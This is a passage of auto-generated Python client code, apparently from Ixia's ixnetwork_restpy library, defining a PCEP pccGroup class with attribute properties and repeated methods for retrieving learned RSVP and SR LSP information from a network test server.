"""
return self._get_attribute('deadInterval')
@property
def DescriptiveName(self):
"""Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but maybe offers more context
Returns:
str
"""
return self._get_attribute('descriptiveName')
@property
def Errors(self):
"""A list of errors that have occurred
Returns:
list(dict(arg1:str[None|/api/v1/sessions/1/ixnetwork/?deepchild=*],arg2:list[str]))
"""
return self._get_attribute('errors')
@property
def KeepaliveInterval(self):
"""Frequency/Time Interval of sending PCEP messages to keep the session active.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('keepaliveInterval')
@property
def MD5Key(self):
"""A value to be used as the secret MD5 Key.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('mD5Key')
@property
def MaxInitiatedLspPerInterval(self):
"""Maximum number of messages can be sent per interval.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('maxInitiatedLspPerInterval')
@property
def MaxLspsPerPcInitiate(self):
"""Controls the maximum number of LSPs that can be present in a PCInitiate message.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('maxLspsPerPcInitiate')
@property
def Multiplier(self):
"""Number of layer instances per parent instance (multiplier)
Returns:
number
"""
return self._get_attribute('multiplier')
@Multiplier.setter
def Multiplier(self, value):
self._set_attribute('multiplier', value)
@property
def Name(self):
"""Name of NGPF element, guaranteed to be unique in Scenario
Returns:
str
"""
return self._get_attribute('name')
@Name.setter
def Name(self, value):
self._set_attribute('name', value)
@property
def PcReplyLspsPerPcc(self):
"""Controls the maximum number of PCE LSPs that can be send as PATH Response.
Returns:
number
"""
return self._get_attribute('pcReplyLspsPerPcc')
@PcReplyLspsPerPcc.setter
def PcReplyLspsPerPcc(self, value):
self._set_attribute('pcReplyLspsPerPcc', value)
@property
def PccIpv4Address(self):
"""IPv4 address of the PCC. This column is greyed out in case of PCEv6.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('pccIpv4Address')
@property
def PceInitiatedLspsPerPcc(self):
"""Controls the maximum number of PCE LSPs that can be Initiated per PCC.
Returns:
number
"""
return self._get_attribute('pceInitiatedLspsPerPcc')
@PceInitiatedLspsPerPcc.setter
def PceInitiatedLspsPerPcc(self, value):
self._set_attribute('pceInitiatedLspsPerPcc', value)
@property
def PcePpagTLVType(self):
"""PPAG TLV Type specifies PCE's capability of interpreting this type of PPAG TLV
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('pcePpagTLVType')
@property
def RateControl(self):
"""The rate control is an optional feature associated with PCE initiated LSP.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('rateControl')
@property
def SessionStatus(self):
"""Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
Returns:
list(str[down|notStarted|up])
"""
return self._get_attribute('sessionStatus')
@property
def SrPceCapability(self):
"""The SR PCE Capability TLV is an optional TLV associated with the OPEN Object to exchange SR capability of PCEP speakers.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('srPceCapability')
@property
def StackedLayers(self):
"""List of secondary (many to one) child layer protocols
Returns:
list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])
"""
return self._get_attribute('stackedLayers')
@StackedLayers.setter
def StackedLayers(self, value):
self._set_attribute('stackedLayers', value)
@property
def StateCounts(self):
"""A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
Returns:
dict(total:number,notStarted:number,down:number,up:number)
"""
return self._get_attribute('stateCounts')
@property
def Status(self):
"""Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
Returns:
str(configured|error|mixed|notStarted|started|starting|stopping)
"""
return self._get_attribute('status')
def add(self, ConnectedVia=None, Multiplier=None, Name=None, PcReplyLspsPerPcc=None, PceInitiatedLspsPerPcc=None, StackedLayers=None):
"""Adds a new pccGroup node on the server and retrieves it in this instance.
Args:
ConnectedVia (list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])): List of layers this layer used to connect to the wire
Multiplier (number): Number of layer instances per parent instance (multiplier)
Name (str): Name of NGPF element, guaranteed to be unique in Scenario
PcReplyLspsPerPcc (number): Controls the maximum number of PCE LSPs that can be send as PATH Response.
PceInitiatedLspsPerPcc (number): Controls the maximum number of PCE LSPs that can be Initiated per PCC.
StackedLayers (list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])): List of secondary (many to one) child layer protocols
Returns:
self: This instance with all currently retrieved pccGroup data using find and the newly added pccGroup data available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._create(locals())
def remove(self):
"""Deletes all the pccGroup data in this instance from server.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, Errors=None, Multiplier=None, Name=None, PcReplyLspsPerPcc=None, PceInitiatedLspsPerPcc=None, SessionStatus=None, StackedLayers=None, StateCounts=None, Status=None):
"""Finds and retrieves pccGroup data from the server.
All named parameters support regex and can be used to selectively retrieve pccGroup data from the server.
By default the find method takes no parameters and will retrieve all pccGroup data from the server.
Args:
ConnectedVia (list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])): List of layers this layer used to connect to the wire
Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group
DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but maybe offers more context
Errors (list(dict(arg1:str[None|/api/v1/sessions/1/ixnetwork/?deepchild=*],arg2:list[str]))): A list of errors that have occurred
Multiplier (number): Number of layer instances per parent instance (multiplier)
Name (str): Name of NGPF element, guaranteed to be unique in Scenario
PcReplyLspsPerPcc (number): Controls the maximum number of PCE LSPs that can be send as PATH Response.
PceInitiatedLspsPerPcc (number): Controls the maximum number of PCE LSPs that can be Initiated per PCC.
SessionStatus (list(str[down|notStarted|up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
StackedLayers (list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])): List of secondary (many to one) child layer protocols
StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
Status (str(configured|error|mixed|notStarted|started|starting|stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
Returns:
self: This instance with matching pccGroup data retrieved from the server available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._select(locals())
def read(self, href):
"""Retrieves a single instance of pccGroup data from the server.
Args:
href (str): An href to the instance to be retrieved
Returns:
self: This instance with the pccGroup data from the server available through an iterator or index
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def ClearPceAllLearnedInfo(self):
"""Executes the clearPceAllLearnedInfo operation on the server.
Clears ALL Learned LSP Information By PCC Device.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('ClearPceAllLearnedInfo', payload=locals(), response_object=None)
def ClearPceAllLearnedInfo(self, SessionIndices):
"""Executes the clearPceAllLearnedInfo operation on the server.
Clears ALL Learned LSP Information By PCC Device.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('ClearPceAllLearnedInfo', payload=locals(), response_object=None)
def ClearPceAllLearnedInfo(self, SessionIndices):
"""Executes the clearPceAllLearnedInfo operation on the server.
Clears ALL Learned LSP Information By PCC Device.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('ClearPceAllLearnedInfo', payload=locals(), response_object=None)
def ClearPceAllLearnedInfo(self, Arg2):
"""Executes the clearPceAllLearnedInfo operation on the server.
Clears ALL Learned LSP Information By PCC Device.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('ClearPceAllLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicAllRsvpLspLearnedInfo(self):
"""Executes the getPceBasicAllRsvpLspLearnedInfo operation on the server.
Gets Basic Information about All RSVP LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicAllRsvpLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicAllRsvpLspLearnedInfo operation on the server.
Gets Basic Information about All RSVP LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicAllRsvpLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicAllRsvpLspLearnedInfo operation on the server.
Gets Basic Information about All RSVP LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicAllRsvpLspLearnedInfo(self, Arg2):
"""Executes the getPceBasicAllRsvpLspLearnedInfo operation on the server.
Gets Basic Information about All RSVP LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceBasicAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicAllSrLspLearnedInfo(self):
"""Executes the getPceBasicAllSrLspLearnedInfo operation on the server.
Gets Basic Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicAllSrLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicAllSrLspLearnedInfo operation on the server.
Gets Basic Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicAllSrLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicAllSrLspLearnedInfo operation on the server.
Gets Basic Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicAllSrLspLearnedInfo(self, Arg2):
"""Executes the getPceBasicAllSrLspLearnedInfo operation on the server.
Gets Basic Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceBasicAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPccRequestedLspLearnedInfo(self):
"""Executes the getPceBasicRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPccRequestedLspLearnedInfo(self, Arg2):
"""Executes the getPceBasicRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceBasicRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPccSyncLspLearnedInfo(self):
"""Executes the getPceBasicRsvpPccSyncLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicRsvpPccSyncLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicRsvpPccSyncLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPccSyncLspLearnedInfo(self, Arg2):
"""Executes the getPceBasicRsvpPccSyncLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceBasicRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPceInitiatedLspLearnedInfo(self):
"""Executes the getPceBasicRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicRsvpPceInitiatedLspLearnedInfo(self, Arg2):
"""Executes the getPceBasicRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceBasicRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPccRequestedLspLearnedInfo(self):
"""Executes the getPceBasicSrPccRequestedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicSrPccRequestedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicSrPccRequestedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPccRequestedLspLearnedInfo(self, Arg2):
"""Executes the getPceBasicSrPccRequestedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceBasicSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPccSyncLspLearnedInfo(self):
"""Executes the getPceBasicSrPccSyncLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicSrPccSyncLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicSrPccSyncLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPccSyncLspLearnedInfo(self, Arg2):
"""Executes the getPceBasicSrPccSyncLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceBasicSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPceInitiatedLspLearnedInfo(self):
"""Executes the getPceBasicSrPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicSrPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicSrPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPceInitiatedLspLearnedInfo(self, Arg2):
"""Executes the getPceBasicSrPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceBasicSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllRsvpLspLearnedInfo(self):
"""Executes the getPceDetailedAllRsvpLspLearnedInfo operation on the server.
Gets Detailed Information about All RSVP LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllRsvpLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedAllRsvpLspLearnedInfo operation on the server.
Gets Detailed Information about All RSVP LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllRsvpLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedAllRsvpLspLearnedInfo operation on the server.
Gets Detailed Information about All RSVP LSPs learnt by this PCE.
Args:
